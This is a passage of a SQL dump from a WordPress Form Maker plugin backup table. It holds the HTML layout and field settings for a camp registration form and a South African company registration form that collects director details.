/*!40000 ALTER TABLE `wpxb_formmaker_backup` DISABLE KEYS */;
INSERT INTO `wpxb_formmaker_backup` VALUES (4,1,3,'Camp Registration Form','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Camper Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Camper Age Group:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Desire Cabin:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Does any one have allergies?%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Has the camper been camping before?%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Any questions or concern:%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - type_submit_reset_7%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',10,'// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don&#39;t need to return any value if you don&#39;t want to stop the submission.\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}','','',0,'%all%','%all%',8,1,'1#**id**#Camper Name:#**label**#type_name#****#2#**id**#Camper Age Group:#**label**#type_own_select#****#3#**id**#Desire Cabin:#**label**#type_radio#****#4#**id**#Does any one have allergies?#**label**#type_radio#****#5#**id**#Has the camper been camping before?#**label**#type_radio#****#6#**id**#Any questions or concern:#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#','1#**id**#Camper Name:#**label**#type_name#****#2#**id**#Camper Age Group:#**label**#type_own_select#****#3#**id**#Desire Cabin:#**label**#type_radio#****#4#**id**#Does any one have allergies?#**label**#type_radio#****#5#**id**#Has the camper been camping before?#**label**#type_radio#****#6#**id**#Any questions or concern:#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'','','USD',0,'1*:*id*:*type_name*:*type*:*Camper Name:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_own_select*:*type*:*Camper Age Group:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:****6-8***8-12***12-15*:*w_choices*:*true***false***false***false*:*w_choices_checked*:*true***false***false***false*:*w_choices_disabled*:*no*:*w_required*:*no*:*w_value_disabled*:****6-8***8-12***12-15*:*w_choices_value*:***********:*w_choices_params*:*wdform_select*:*w_class*:**:*new_field*:*3*:*id*:*type_radio*:*type*:*Desire Cabin:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*hor*:*w_flow*:*Cabin 1***Cabin 2***Cabin 3***Cabin 4***Cabin 5***Cabin 6*:*w_choices*:*false***false***false***false***false***false*:*w_choices_checked*:*3*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Cabin 1***Cabin 2***Cabin 3***Cabin 4***Cabin 5***Cabin 6*:*w_choices_value*:*****************:*w_choices_params*:**:*w_class*:**:*new_field*:*4*:*id*:*type_radio*:*type*:*Does any one have allergies?*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*ver*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*5*:*id*:*type_radio*:*type*:*Has the camper been camping before?*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*ver*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*6*:*id*:*type_textarea*:*type*:*Any questions or concern:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*7*:*id*:*type_submit_reset*:*type*:*type_submit_reset_7*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Registration Form','Camping can be enjoyed through all four seasons.','http://companyregistration.online/wp-content/plugins/form-maker/images/demo/3.png','none',1),(14,0,11,'Standard Company Registration Form Copy','embedded','info@companyregistration.online,','<div class=\"wdform-page-and-images\" style=\"display: table; border-width: 1px; border-top: 1px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Section 1\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\" style=\"\">%1 - Insert todays date:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\" style=\"\">%2 - Proposed Company Names:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - custom_3%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - How many Directors in your company:%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - custom_5%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Do you have a business address:%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - custom_7%</div></div></div><div wdid=\"8\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%8 - custom_8%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\">%9 - custom_9%</div><div wdid=\"10\" class=\"wdform_row ui-sortable-handle\" style=\"\">%10 - Physical Address of the business:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"left\"></div><div id=\"page_numbersform_id_temp1\" valign=\"middle\" style=\"display: table-cell;\" align=\"center\"><span class=\"page_numbersform_id_temp\">1/4</span></div><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"right\"><span id=\"page_next_1\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Next</span></div></div></div></div></div></div></div></div><div class=\"wdform-page-and-images\" style=\"display: table; border-width: 1px; border-top: 1px solid black;\"><div id=\"form_id_tempform_view2\" page_title=\"Section 2\" class=\"wdform_page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"true\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\">%16 - custom_16%</div><div wdid=\"17\" class=\"wdform_row ui-sortable-handle\">%17 - custom_17%</div><div wdid=\"18\" class=\"wdform_row ui-sortable-handle\">%18 - Full Name:%</div><div wdid=\"19\" class=\"wdform_row ui-sortable-handle\" style=\"\">%19 - Phone:%</div><div wdid=\"20\" class=\"wdform_row ui-sortable-handle\">%20 - Physical home address 1:%</div></div></div><div wdid=\"26\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%26 - custom_26%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"27\" class=\"wdform_row ui-sortable-handle\">%27 - custom_27%</div><div wdid=\"40\" class=\"wdform_row ui-sortable-handle\" style=\"\">%40 - Full Name:(2)%</div><div wdid=\"41\" class=\"wdform_row ui-sortable-handle\" style=\"\">%41 - Phone:(2)%</div><div wdid=\"28\" class=\"wdform_row ui-sortable-handle\">%28 - Physical home address 2:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav2\" style=\"display: table-row;\"><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"left\"><span id=\"page_previous_2\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Previous</span></div><div id=\"page_numbersform_id_temp2\" valign=\"middle\" style=\"display: table-cell;\" align=\"center\"><span class=\"page_numbersform_id_temp\">2/4</span></div><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"right\"><span id=\"page_next_2\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Next</span></div></div></div></div></div></div></div></div><div class=\"wdform-page-and-images\" style=\"display: table; border-width: 1px; border-top: 1px solid black;\"><div id=\"form_id_tempform_view3\" page_title=\"Section 3\" class=\"wdform_page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"42\" class=\"wdform_row ui-sortable-handle\" style=\"\">%42 - custom_42%</div><div wdid=\"43\" class=\"wdform_row ui-sortable-handle\" style=\"\">%43 - Full Name:(3)%</div><div wdid=\"44\" class=\"wdform_row ui-sortable-handle\">%44 - Phone:(3)%</div><div wdid=\"45\" class=\"wdform_row ui-sortable-handle\">%45 - Physical home address 3:%</div></div></div><div wdid=\"51\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%51 - custom_51%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"53\" class=\"wdform_row ui-sortable-handle\" style=\"\">%53 - custom_53%</div><div wdid=\"54\" class=\"wdform_row ui-sortable-handle\" style=\"\">%54 - Full Name:(4)%</div><div wdid=\"55\" class=\"wdform_row ui-sortable-handle\">%55 - Phone:(4)%</div><div wdid=\"56\" class=\"wdform_row ui-sortable-handle\">%56 - Physical home address 4:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav3\" style=\"display: table-row;\"><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"left\"><span id=\"page_previous_3\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Previous</span></div><div id=\"page_numbersform_id_temp3\" valign=\"middle\" style=\"display: table-cell;\" align=\"center\"><span class=\"page_numbersform_id_temp\">3/4</span></div><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"right\"><span id=\"page_next_3\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Next</span></div></div></div></div></div></div></div></div><div class=\"wdform-page-and-images\" style=\"display: table; border-width: 1px; border-top: 1px solid black;\"><div id=\"form_id_tempform_view4\" page_title=\"Section 4\" class=\"wdform_page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"62\" class=\"wdform_row ui-sortable-handle\">%62 - custom_62%</div><div wdid=\"63\" class=\"wdform_row ui-sortable-handle\">%63 - Upload certified Copies of all Director/s IDs/Passports:%</div><div wdid=\"64\" class=\"wdform_row ui-sortable-handle\">%64 - custom_64%</div><div wdid=\"66\" class=\"wdform_row ui-sortable-handle\" style=\"\">%66 - type_submit_reset_66%</div><div wdid=\"65\" class=\"wdform_row ui-sortable-handle\">%65 - Was the form easy to complete?:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav4\" style=\"display: table-row;\"><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"left\"><span id=\"page_previous_4\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Previous</span></div><div id=\"page_numbersform_id_temp4\" valign=\"middle\" style=\"display: table-cell;\" align=\"center\"><span class=\"page_numbersform_id_temp\">4/4</span></div><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"right\"></div></div></div></div></div></div></div></div>',0,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',67,1,'1#**id**#Insert todays date:#**label**#type_date_new#****#2#**id**#Proposed Company Names:#**label**#type_textarea#****#3#**id**#custom_3#**label**#type_editor#****#4#**id**#How many Directors in your company:#**label**#type_own_select#****#5#**id**#custom_5#**label**#type_editor#****#6#**id**#Do you have a business address:#**label**#type_radio#****#7#**id**#custom_7#**label**#type_editor#****#9#**id**#custom_9#**label**#type_editor#****#10#**id**#Street Address#**label**#type_address#****#11#**id**#Suburb#**label**#type_address#****#12#**id**#City#**label**#type_address#****#13#**id**#Province#**label**#type_address#****#14#**id**#Postal Code#**label**#type_address#****#16#**id**#custom_16#**label**#type_editor#****#17#**id**#custom_17#**label**#type_editor#****#18#**id**#Full Name:#**label**#type_name#****#19#**id**#Phone:#**label**#type_phone_new#****#20#**id**#Street Address#**label**#type_address#****#21#**id**#Suburb#**label**#type_address#****#22#**id**#City#**label**#type_address#****#23#**id**#Province#**label**#type_address#****#24#**id**#Postal Code#**label**#type_address#****#27#**id**#custom_27#**label**#type_editor#****#40#**id**#Full Name:(2)#**label**#type_name#****#41#**id**#Phone:(2)#**label**#type_phone_new#****#28#**id**#Street Address#**label**#type_address#****#29#**id**#Suburb#**label**#type_address#****#30#**id**#City#**label**#type_address#****#31#**id**#Province#**label**#type_address#****#32#**id**#Postal Code#**label**#type_address#****#42#**id**#custom_42#**label**#type_editor#****#43#**id**#Full Name:(3)#**label**#type_name#****#44#**id**#Phone:(3)#**label**#type_phone_new#****#45#**id**#Street Address#**label**#type_address#****#46#**id**#Suburb#**label**#type_address#****#47#**id**#City#**label**#type_address#****#48#**id**#Province#**label**#type_address#****#49#**id**#Postal Code#**label**#type_address#****#53#**id**#custom_53#**label**#type_editor#****#54#**id**#Full Name:(4)#**label**#type_name#****#55#**id**#Phone:(4)#**label**#type_phone_new#****#56#**id**#Street Address#**label**#type_address#****#57#**id**#Suburb#**label**#type_address#****#58#**id**#City#**label**#type_address#****#59#**id**#Province#**label**#type_address#****#60#**id**#Postal Code#**label**#type_address#****#62#**id**#custom_62#**label**#type_editor#****#63#**id**#Upload certified Copies of all Director/s IDs/Passports:#**label**#type_file_upload#****#64#**id**#custom_64#**label**#type_editor#****#66#**id**#type_submit_reset_66#**label**#type_submit_reset#****#65#**id**#Was the form easy to complete?:#**label**#type_star_rating#****##**id**##**label**##****#','1#**id**#Insert todays date:#**label**#type_date_new#****#2#**id**#Proposed Company Names:#**label**#type_textarea#****#3#**id**#custom_3#**label**#type_editor#****#4#**id**#How many Directors in your company:#**label**#type_own_select#****#5#**id**#custom_5#**label**#type_editor#****#6#**id**#Do you have a business address:#**label**#type_radio#****#7#**id**#custom_7#**label**#type_editor#****#9#**id**#custom_9#**label**#type_editor#****#10#**id**#Street Address#**label**#type_address#****#11#**id**#Suburb#**label**#type_address#****#12#**id**#City#**label**#type_address#****#13#**id**#Province#**label**#type_address#****#14#**id**#Postal Code#**label**#type_address#****#16#**id**#custom_16#**label**#type_editor#****#17#**id**#custom_17#**label**#type_editor#****#18#**id**#Full Name:#**label**#type_name#****#19#**id**#Phone:#**label**#type_phone_new#****#20#**id**#Street Address#**label**#type_address#****#21#**id**#Suburb#**label**#type_address#****#22#**id**#City#**label**#type_address#****#23#**id**#Province#**label**#type_address#****#24#**id**#Postal Code#**label**#type_address#****#27#**id**#custom_27#**label**#type_editor#****#40#**id**#Full Name:(2)#**label**#type_name#****#41#**id**#Phone:(2)#**label**#type_phone_new#****#28#**id**#Street Address#**label**#type_address#****#29#**id**#Suburb#**label**#type_address#****#30#**id**#City#**label**#type_address#****#31#**id**#Province#**label**#type_address#****#32#**id**#Postal Code#**label**#type_address#****#42#**id**#custom_42#**label**#type_editor#****#43#**id**#Full Name:(3)#**label**#type_name#****#44#**id**#Phone:(3)#**label**#type_phone_new#****#45#**id**#Street Address#**label**#type_address#****#46#**id**#Suburb#**label**#type_address#****#47#**id**#City#**label**#type_address#****#48#**id**#Province#**label**#type_address#****#49#**id**#Postal Code#**label**#type_address#****#53#**id**#custom_53#**label**#type_editor#****#54#**id**#Full Name:(4)#**label**#type_name#****#55#**id**#Phone:(4)#**label**#type_phone_new#****#56#**id**#Street Address#**label**#type_address#****#57#**id**#Suburb#**label**#type_address#****#58#**id**#City#**label**#type_address#****#59#**id**#Province#**label**#type_address#****#60#**id**#Postal Code#**label**#type_address#****#62#**id**#custom_62#**label**#type_editor#****#63#**id**#Upload certified Copies of all Director/s IDs/Passports:#**label**#type_file_upload#****#64#**id**#custom_64#**label**#type_editor#****#66#**id**#type_submit_reset_66#**label**#type_submit_reset#****#65#**id**#Was the form easy to complete?:#**label**#type_star_rating#****#','0','percentage','false','true','','','',0,'testmode','','USD',0,'1*:*id*:*type_date_new*:*type*:*Insert todays date:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_date*:*yes*:*w_required*:*yes*:*w_show_image*:**:*w_class*:*dd/mm/yy*:*w_format*:*0*:*w_start_day*:**:*w_default_date*:**:*w_min_date*:**:*w_max_date*:**:*w_invalid_dates*:*yes***yes***yes***yes***yes***yes***yes*:*w_show_days*:*yes*:*w_hide_time*:*...*:*w_but_val*:*no*:*w_disable_past_days*:**:*new_field*:*2*:*id*:*type_textarea*:*type*:*Proposed Company Names:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*yes*:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_editor*:*type*:*custom_3*:*w_field_label*:*<p><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\">Provide at least 3-4 names each on a new line. Try different names rather than different variations of the same name. Note if the name is not available this may cause delays in the registration of the company; i.e. until a suitable name is found.</span></p>*:*w_editor*:**:*new_field*:*4*:*id*:*type_own_select*:*type*:*How many Directors in your company:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Select value***One***Two***Three***Four*:*w_choices*:*true***false***false***false***false*:*w_choices_checked*:*true***false***false***false***false*:*w_choices_disabled*:*no*:*w_required*:*no*:*w_value_disabled*:****One***Two***Three***Four*:*w_choices_value*:**************:*w_choices_params*:*wdform_select*:*w_class*:**:*new_field*:*5*:*id*:*type_editor*:*type*:*custom_5*:*w_field_label*:*<p><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\">If there are more than 4 directors; complete the details for the first 4 directors and email the remaining directors details, as per 2nd director requirements below, to store@companyregistration.online</span></p>*:*w_editor*:**:*new_field*:*6*:*id*:*type_radio*:*type*:*Do you have a business address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*7*:*id*:*type_editor*:*type*:*custom_7*:*w_field_label*:*<p><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\">If not, select \'No\', the home address of the 1st Director will used as the business address. This can be changed and should be changed once your business has an address.</span></p>*:*w_editor*:**:*new_field*:*8*:*id*:*type_section_break*:*type*:*custom_8*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*9*:*id*:*type_editor*:*type*:*custom_9*:*w_field_label*:*<h3><span style=\"color: rgb(0, 204, 255); font-family: trebuchet ms,geneva,sans-serif;\" data-mce-style=\"color: #00ccff; font-family: trebuchet ms,geneva,sans-serif;\">Business Details</span><br></h3>*:*w_editor*:**:*new_field*:*10*:*id*:*type_address*:*type*:*Physical Address of the business:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Suburb***City***Province***Postal Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*16*:*id*:*type_editor*:*type*:*custom_16*:*w_field_label*:*<h3><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">Incorporator or 1st Director Details</span><br data-mce-bogus=\"1\"></h3>*:*w_editor*:**:*new_field*:*17*:*id*:*type_editor*:*type*:*custom_17*:*w_field_label*:*<p><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\">The Incoporator is generally the 1st Director</span><br></p>*:*w_editor*:**:*new_field*:*18*:*id*:*type_name*:*type*:*Full Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Middle***Surname*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*yes***yes*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*19*:*id*:*type_phone_new*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:*za*:*w_top_country*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*20*:*id*:*type_address*:*type*:*Physical home address 1:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Suburb***City***Province***Postal Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*26*:*id*:*type_section_break*:*type*:*custom_26*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*27*:*id*:*type_editor*:*type*:*custom_27*:*w_field_label*:*<h3><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">2nd Director\'s Details</span><br data-mce-bogus=\"1\"></h3>*:*w_editor*:**:*new_field*:*40*:*id*:*type_name*:*type*:*Full Name:(2)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Middle***Surname*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*yes***yes*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*41*:*id*:*type_phone_new*:*type*:*Phone:(2)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:*za*:*w_top_country*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*28*:*id*:*type_address*:*type*:*Physical home address 2:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Suburb***City***Province***Postal Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*42*:*id*:*type_editor*:*type*:*custom_42*:*w_field_label*:*<h3><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">3rd Director\'s Details</span><br data-mce-bogus=\"1\"></h3>*:*w_editor*:**:*new_field*:*43*:*id*:*type_name*:*type*:*Full Name:(3)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Middle***Surname*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*yes***yes*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*44*:*id*:*type_phone_new*:*type*:*Phone:(3)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:*za*:*w_top_country*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*45*:*id*:*type_address*:*type*:*Physical home address 3:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Suburb***City***Province***Postal Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*51*:*id*:*type_section_break*:*type*:*custom_51*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*53*:*id*:*type_editor*:*type*:*custom_53*:*w_field_label*:*<h3><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">4th Director\'s Details</span><br data-mce-bogus=\"1\"></h3>*:*w_editor*:**:*new_field*:*54*:*id*:*type_name*:*type*:*Full Name:(4)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Middle***Surname*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*yes***yes*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*55*:*id*:*type_phone_new*:*type*:*Phone:(4)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:*za*:*w_top_country*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*56*:*id*:*type_address*:*type*:*Physical home address 4:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Suburb***City***Province***Postal Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*62*:*id*:*type_editor*:*type*:*custom_62*:*w_field_label*:*<h3><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">Almost Done</span><br data-mce-bogus=\"1\"></h3>*:*w_editor*:**:*new_field*:*63*:*id*:*type_file_upload*:*type*:*Upload certified Copies of all Director/s IDs/Passports:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*http://companyregistration.online/wp-content/uploads/form-maker*:*w_destination*:*jpg, jpeg, png, gif, doc, docx, xls, 